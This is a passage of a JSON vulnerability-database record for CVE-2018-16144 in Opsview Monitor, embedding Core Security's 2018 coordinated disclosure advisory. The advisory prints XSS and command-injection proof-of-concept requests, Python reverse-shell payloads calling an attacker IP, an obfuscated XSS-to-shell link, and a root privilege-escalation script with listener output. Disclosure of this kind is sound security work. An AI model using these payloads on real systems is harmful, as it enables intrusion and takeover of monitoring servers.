},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.4.2",
"versionStartIncluding": "5.4.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:opsview:opsview:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "5.3.1",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16144"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Fernando Diaz, Fernando Catoira",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 0.1
},
"cve": "CVE-2018-16144",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-16144",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-17452",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-16144",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-16144",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-17452",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-153",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2018-16144",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The test connection functionality in the NetAudit section of Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to command injection due to improper sanitization of the rancid_password parameter. Opsview Monitor Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. OpsviewMonitor is a virtual appliance designed to be deployed in an organization\u0027s network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a command execution vulnerability that allows an attacker to obtain command execution on the system as a nagios user. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nOpsview Monitor Multiple Vulnerabilities\n\n1. **Advisory Information**\n\nTitle: Opsview Monitor Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0008\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities\nDate published: 2018-09-04\nDate of last update: 2018-09-04\nVendors contacted: Opsview\nRelease mode: Coordinated release\n\n2. **Vulnerability Information**\n\nClass: Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Special Elements used in an OS\nCommand [CWE-78], Improper Neutralization of Special Elements used in\nan OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,\nCVE-2018-16145\n\n3. 
**Vulnerability Description**\n\nOpsview\u0027s website states that:\n\nOpsview[1] builds monitoring software that helps DevOps understand how\nthe performance of their hybrid IT infrastructure \u0026 apps impacts\nbusiness service delivery. Opsview Monitor supports +3500 Nagios plugins\nand service checks making it easy to monitor everything from Docker and\nVMware to Amazon Web Services, Hyper-V and more. \n\n4. **Vulnerable Packages**\n\n . Opsview Monitor 5.4\n . Opsview Monitor 5.3\n . Opsview Monitor 5.2\n\nOther products and versions might be affected, but they were not tested. \n\n5. **Vendor Information, Solutions and Workarounds**\n\nOpsview released the following versions of its product that fix the\nreported issues. Opsview Monitor 6.0\n . Opsview Monitor 5.4.2\n . Opsview Monitor 5.3.1\n\nIn addition, Opsview published the following release notes:\n\n . https://knowledge.opsview.com/v5.4/docs/whats-new\n . https://knowledge.opsview.com/v5.3/docs/whats-new\n\n6. **Credits**\n\nThese vulnerabilities were discovered and researched by Fernando Diaz\nand Fernando Catoira from Core Security Consulting Services. The\npublication of this advisory was coordinated by Leandro Cuozzo from Core\nAdvisories Team. \n \n7. \nMultiple vulnerabilities were found in the context of this appliance,\nwhich could allow a remote attacker to compromise the system. \nVulnerabilities described in 7.1 and 7.2 could be abused to execute\nmalicious JavaScript code in the context of a legitimate user. Finally, the\nissue found in one of the scripts run during the boot process presented\nin 7.5 would allow attackers to elevate their privileges from nagios\nuser to root after a system restart, hence obtaining full control of the\nappliance. \n\n7.1. **Reflected Cross-Site Scripting in Diagnostics**\n\n[CVE-2018-16148] The \u0027diagnosticsb2ksy\u0027 parameter of the \u0027/rest\u0027\nendpoint is vulnerable to Cross-Site Scripting. 
\n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;\nauth_tkt=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%3D%3D\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n-----/\n\n7.2. **Persistent Cross-Site Scripting in Settings endpoint**\n\n[CVE-2018-16147] The \u0027data\u0027 parameter of the \u0027/settings/api/router\u0027\nendpoint is vulnerable to Cross-Site Scripting. The following proof of\nconcept demonstrates the vulnerability:\n \n/-----\nPOST /settings/api/router?_dc=1521575692128 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: rifle\nx-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 506\nCookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;\nauth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D\nConnection: 
close\n\n[{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":2},{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"profile\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":3}]\n-----/\n\nThe input will be stored without any sanitization and rendered every\ntime the /settings section is visited by the user. It\u0027s important to\npoint that this XSS is self stored and it\u0027s executed only in the context\nof the victim\u0027s session. However, this vulnerability can be exploited by\nan attacker to gain persistency and execute the malicious code each time\nthe victim accesses to the settings section. 
\nExcerpt of the source code showing the injected script tag:\n\n/-----\n[{\"property\":\"name\",\"root\":\"data\",\"direction\":\"ASC\"}]}},\"contact\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"name\",\"root\":\"data\"}]}},\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"pageSize\":50,\"filters\":[],\"page\":1}},\"hostcheckcommand\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"priority\",\"root\":\"data\"}]}},\"netflow_collector\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"page\":1,\"filters\":[],\"pageSize\":50}},\"\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"\n-----/\n\n7.3. **Notification abuse leading to remote command execution**\n\n[CVE-2018-16146] Opsview Web Management console provides a functionality\naccessible by an authenticated administrator to test notifications that\nare triggered under certain configurable events. The \u0027value\u0027 parameter\nis not properly sanitized, leading to an arbitrary command injection\nexecuted on the system with nagios\u0027 user privileges. 
\n \nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/notificationmethod/testnotification?_dc=1520444703477\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)\nGecko/20100101 Firefox/58.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 376\nCookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;\nopsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;\nauth_tkt=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%3D%3D\nConnection: close\n\n{\"message\":\"Test\nMessage\",\"command\":\"submit_xmpp_script\",\"variables\":[],\"test_variables\":[{\"name\":\"PAGER\",\"value\":\"123123123\n|| python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\u003cattackerIP\u003e\\\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);\u0027\"}],\"id\":\"20\"}\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nAdditionally, it is possible to combine this issue with a redirection\nfunctionality within the management console and the vulnerability\ndescribed in 7.1 (Reflected Cross-Site Scripting), to build a specially\ncrafted link that could be sent to an administrator to trigger a reverse\nshell. \n\nIn order to perform the attack, consider the following:\n\n. API\u0027s sensitive actions require a \u0027restToken\u0027 to be processed. 
This\ntoken could be obtained by a Cross-Site Scripting attack from a specific\nendpoint (/settings). Abuse the login page redirection functionality to force the user to\naccess the Cross-Site Scripting vulnerable URL described in 7.1 (you may\nalso abuse the Cross-Site scripting vulnerability reported in\nhttps://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). \nIf the user is already authenticated he will be automatically redirected. \nOtherwise, the login page will appear and the redirection will take\nplace after a successful login. \n\nThe following proof of concept presents a crafted link that could\ntrigger a reverse shell if accessed by an administrator:\n\n/-----\nhttps://\u003cserverIP\u003e/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%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%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1\n-----/\n\nOnce clicked, the authenticated administrator will be redirected to the\nvulnerable section where his browser will perform a request to the\n\u0027/settings\u0027 endpoint in order to obtain a valid \u0027restToken\u0027. Finally,\nusing that token, the API request to\n\u0027rest/config/notificationmethod/testnotification\u0027 will be exploited thus\nresulting in a reverse shell. \n\n7.4. 
**Rancid test connection functionality abuse leading to command\nexecution**\n\n[CVE-2018-16144] NetAudit is a section within Network Analyzer that\nallows the user to automate the backing up of network devices\u0027\nconfiguration files to a centralized location. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: b3d716e0157fd6337e6978220188051d8c578850\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 434\nCookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;\nauth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D\nConnection: 
close\n\nip=\u003cattackerIP\u003e++++++\u0026rancid_vendor=1\u0026rancid_username=234234+add+password+xxxxx\u0026rancid_connection_type=telnet\u0026rancid_autoenable=1\u0026rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+\u0027import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"\u003cattackerIP\u003e\",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\u0027`\u0026host_id=2\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n$ uname -a\nLinux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34\nUTC 2018 x86_64 x86_64 x86_64 GNU/Linux\n-----/\n\n7.5. **Script modification could allow local privilege escalation**\n\n[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios\nprivileges and the scripts that run at boot time, impersonate nagios\nuser during its execution. However, the\n\u0027/etc/init.d/opsview-reporting-module\u0027 script invokes the\n\u0027/opt/opsview/jasper/bin/db_jasper\u0027 script before dropping root\nprivileges. \n \nThe following excerpt shows the vulnerable code:\n \n/-----\n/etc/init.d/opsview-reporting-module:\n\n/opt/opsview/jasper/bin/db_jasper db_exists 2\u003e /dev/null\nif [ $? != 0 ]; then\n echo \"Attempted to start jasperserver but MySQL credentials are wrong.\"\n exit 0\nfi\n\nDAEMON=/opt/opsview/jasper/bin/rc.jasperserver\n\ntest -x $DAEMON || exit 0\n\n# Switch to opsview user if run as root\nid | grep \"uid=0(\" \u003e/dev/null\nif [ $? 
= 0 ] ; then\n su - opsview -c \"$DAEMON $@\"\nelse\n exec $DAEMON $@\nfi\n-----/\n\nThe file \u0027/opt/opsview/jasper/bin/db_jasper\u0027, which is invoked by the\nvulnerable script, can be edited by the nagios user which belongs to the\n\u0027opsview\u0027 group. \n \n/-----\nls -ltr /opt/opsview/jasper/bin/db_jasper\n-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017\n/opt/opsview/jasper/bin/db_jasper\nnagios@image-builder-299:/home/admin$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nSince \u0027db_jasper\u0027 receives \u0027db_exists\u0027 as an argument, which is later\nused in a case statement, an attacker could edit that specific part of\nthe script in order to execute arbitrary code once the appliance is\nrebooted. \n\nThe following excerpt shows the attacker\u0027s bash script which, after\nexecution, will trigger a reverse shell with root privileges:\n\n/-----\nwhile [ \"x$1\" != \"x\" ] ; do\n case \"$1\" in\n db_export)\n db_export\n ;;\n db_export_test)\n db_export_test\n ;;\n db_export_initial)\n TEST=1\n db_backup\n ;;\n db_import)\n db_import\n ;;\n db_install)\n db_install\n ;;\n db_backup)\n db_backup\n ;;\n db_restore)\n db_restore\n ;;\n db_exists)\n python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\u003cattackerIP\u003e\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\u0027 \u0026\n db_exists\n exit $?\n ;;\n db_upgrade)\n db_upgrade\n exit $?\n ;;\n *)\n die \"Usage: $0\n{db_export|db_import|db_install|db_backup|db_restore}\"\n ;;\n\n esac\n shift\ndone\n-----/\n\n/-----\n$nc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 45566)\n# id\nuid=0(root) gid=0(root) groups=0(root)\n-----/\n\n8. 
**Report Timeline**\n\n2018-05-03: Core Security sent an initial notification to Opsview,\nasking for GPG keys in order to send draft advisory. \n2018-05-04: Opsview replied attaching its GPG keys. \n2018-05-04: Core Security sent the encrypted draft advisory. \n2018-05-04: Opsview confirmed the reception of the advisory and informed\nan initial response would be ready by May 11th. \n2018-05-11: Opsview replied saying they were able to reproduce all of\nthe reported vulnerabilities and confirmed that they were present in all\nsupported versions of Opsview Monitor (5.4, 5.3 and 5.2). \nIn addition, Opsview informed that were planning to release a fix for\nthese versions by the end of July. \n2018-05-11: Core Security thanked the confirmation. \n2018-06-25: Opsview informed that they were planning to release a major\nupdate for the product (6.0) at the end of July. This update will\naddress all reported vulnerabilities. Also, they informed that the\nprevious versions of the product would be fixed by the end of August. \n2018-06-27: Core Security thanked the status update and asked for a\ntentative public disclosure date. \n2018-07-16: Core Security requested a status update. \n2018-07-18: Opsview proposed to set a tentative publication date by the\nend of August when they release the fixes for its earlier versions. \n2018-07-18: Core Security agreed with the Opsview\u0027s proposal. \n2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0\nrelease will be available on July 25th. In addition, they\ninformed that they didn\u0027t have the exact release date for the updates to\nprevious versions of the product. \n2018-08-06: Core Security requested a status update for the remaining\nfixes. \n2018-08-13: Opsview replied saying that they were targeting the week of\nAugust 24th for release the fixes of their earlier product versions and\nthey would confirm the exact date at the end of the next week. \n2018-08-13: Core Security thanked the reply. 
\n2018-08-24: Opsview informed Core Security that the remaining fixed\nversions will be available on August 29th. \n2018-08-24: Core Security thanked the update and proposed September 4th\nas the coordinated release date. \n2018-08-28: Opsview agreed on the proposed release date. \n2018-09-04: Advisory CORE-2018-0008 published. \n\n9. **References**\n\n[1] https://www.opsview.com/solutions\n\n10. **About CoreLabs**\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at: http://corelabs.coresecurity.com. \n\n11. **About Core Security**\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and\ncontext needed to manage security risks across the enterprise. This\nshared insight gives customers a comprehensive view of their security\nposture to make better security remediation decisions. Better insight\nallows organizations to prioritize their efforts to protect critical\nassets, take action sooner to mitigate access risk, and react faster if\na breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. 
**Disclaimer**\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-16144",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-17452",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-16144",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149236",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"id": "VAR-201809-0902",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
}
]
},
"last_update_date": "2023-12-18T12:01:17.739000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "5.3.1 - Security Update",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"title": "5.4.2 Released: 04th September 2018",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"title": "Patch for OpsviewMonitor Command Execution Vulnerability (CNVD-2018-17452)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/139519"
},
{
"title": "Opsview Monitor Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84505"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "NVD",
